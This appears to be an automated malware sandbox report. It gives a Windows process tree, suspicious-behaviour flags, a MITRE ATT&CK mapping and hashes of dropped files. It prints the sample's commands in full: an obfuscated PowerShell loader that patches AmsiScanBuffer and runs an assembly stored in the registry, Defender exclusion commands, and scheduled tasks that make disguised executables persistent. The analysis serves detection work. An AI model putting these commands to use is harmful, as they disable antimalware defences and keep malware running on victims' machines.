PID 2832 wrote to memory of 620	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1068	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1080	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1188	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1220	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1264	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1304	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1352	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1380	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1472	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1496	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1556	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1628	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1680	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1732	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1768	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1816	2832	dllhost.exe	svchost.exe
PID 4732 wrote to memory of 4932	4732	www.msedge.exe	powershell.exe
PID 4732 wrote to memory of 4932	4732	www.msedge.exe	powershell.exe
PID 668 wrote to memory of 2792	668	lsass.exe	sysmon.exe
PID 668 wrote to memory of 2792	668	lsass.exe	sysmon.exe
PID 2832 wrote to memory of 2016	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 2012	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1120	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1324	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1440	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 2116	2832	dllhost.exe	spoolsv.exe
PID 2832 wrote to memory of 2188	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 2336	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 2496	2832	dllhost.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:596
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1012
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2845545c-c46c-4e75-b13d-d17368e4d92e}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2832

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1188
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:APEXJnUJvumS{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QQDCAMQvFpKknz,[Parameter(Position=1)][Type]$ZcQSVPxcgB)$oYyaHAAspsm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+'r'+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'t'+'e'+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+'ub'+[Char](108)+'i'+'c'+','+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+',A'+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'l'+[Char](97)+''+'s'+'s',[MulticastDelegate]);$oYyaHAAspsm.DefineConstructor('R'+'T'+''+[Char](83)+'p'+'e'+''+'c'+''+'i'+'a'+'l'+'N'+'a'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$QQDCAMQvFpKknz).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'m'+[Char](101)+',M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$oYyaHAAspsm.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'By'+[Char](83)+''+'i'+''+[Char](103)+','+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+'o'+'t'+[Char](44)+''+'V'+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$ZcQSVPxcgB,$QQDCAMQvFpKknz).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+'M'+[Char](97)+'na'+[Char](103)+'ed');Write-Output $oYyaHAAspsm.CreateType();}$fRfalvEXxFMfm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+'t'+''+'e'+''+[Char](109)+'.'+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+'.W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'Uns'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+'t'+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$PdZPUrXOiiZoLW=$fRfalvEXxFMfm.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wFdmwjfUJYfIFKobLGe=APEXJnUJvumS @([String])([IntPtr]);$dARMKFvIseHEZpcVBMrISH=APEXJnUJvumS @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eWsXYbOusrY=$fRfalvEXxFMfm.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+'o'+'d'+'u'+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$cFptKUqzOghRyM=$PdZPUrXOiiZoLW.Invoke($Null,@([Object]$eWsXYbOusrY,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+'A')));$eIWpIbTACtiMbTxbD=$PdZPUrXOiiZoLW.Invoke($Null,@([Object]$eWsXYbOusrY,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'ect')));$wQxyvSI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cFptKUqzOghRyM,$wFdmwjfUJYfIFKobLGe).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+'.'+'d'+[Char](108)+''+'l'+'');$wUaNMIovnaOcxHkib=$PdZPUrXOiiZoLW.Invoke($Null,@([Object]$wQxyvSI,[Object]('A'+'m'+''+'s'+''+[Char](105)+'Sc'+'a'+''+[Char](110)+''+[Char](66)+'u'+'f'+''+'f'+''+[Char](101)+''+'r'+'')));$MMLbgKelNv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eIWpIbTACtiMbTxbD,$dARMKFvIseHEZpcVBMrISH).Invoke($wUaNMIovnaOcxHkib,[uint32]8,4,[ref]$MMLbgKelNv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wUaNMIovnaOcxHkib,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eIWpIbTACtiMbTxbD,$dARMKFvIseHEZpcVBMrISH).Invoke($wUaNMIovnaOcxHkib,[uint32]8,0x20,[ref]$MMLbgKelNv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](119)+'ww'+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2848
- C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com
  C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2232
- C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com
  C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com
  2⤵
  - Executes dropped EXE
  PID:1340
- C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com
  C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com
  2⤵
  - Executes dropped EXE
  PID:3040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1380
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1472

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1324

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1440

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2748

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2904

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3420

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3512
- C:\Users\Admin\AppData\Local\Temp\ME77ZTVpfPe1.exe
  "C:\Users\Admin\AppData\Local\Temp\ME77ZTVpfPe1.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1392
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionExtension '.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5000
- - C:\Users\Admin\AppData\Local\Temp\Powershell.exe
    C:\Users\Admin\AppData\Local\Temp/Powershell.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:4900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\www.msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2884
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.msedge" /SC ONLOGON /TR "C:\Windows\Fonts\www.msedge.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3416
  - - C:\Windows\Fonts\www.msedge.exe
      "C:\Windows\Fonts\www.msedge.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4732
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\www.msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4932
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4804
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3848
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1532
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2028
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.MsEgeServ.com'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3944
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:336
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "www.MsEgeServ" /tr "C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1104
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3932
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4692
  - - C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe
      "C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3160
    - - C:\Users\Admin\AppData\Local\Temp\REHQDPN.exe
        
        C:\Users\Admin\AppData\Local\Temp\REHQDPN.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:3228
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\423e4f63.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3612

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3816

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3972

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1672

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:828

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1248

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4488

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1704

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3496

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:2156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:2876

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:3140

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:952

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5088

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:4032

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:1708

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:1392

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:3568

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\www.MsEgeServ.com.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\XH3Z2ZON\k2[1].rar

Filesize
4B

MD5
d3b07384d113edec49eaa6238ad5ff00

SHA1
f1d2d2f924e986ac86fdf7b36c94bcdf32beec15

SHA256
b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

SHA512
0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b7189719e6df2c3dfc76197ec3f31f7a

SHA1
effd91412deadc87cc10ef76cdecc1e0b54b6d41

SHA256
1c72fa37d078b92c7e900b2e3d17c43c34d936a696a8ddf6c519f4a80308b892

SHA512
2df1f1d45844da7ffb17cdfb411f223e9c614c00f5cf7eb5ba92bf7ba174875af2a515371208286c95c0479c934ae2c6a83dfc0b54380be89db1eddd19faf978

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ff1971bb24fe9bf99be3b84cf0ab381a

SHA1
fc3c508c1858886d99df4616cdbd2893ce922eaa

SHA256
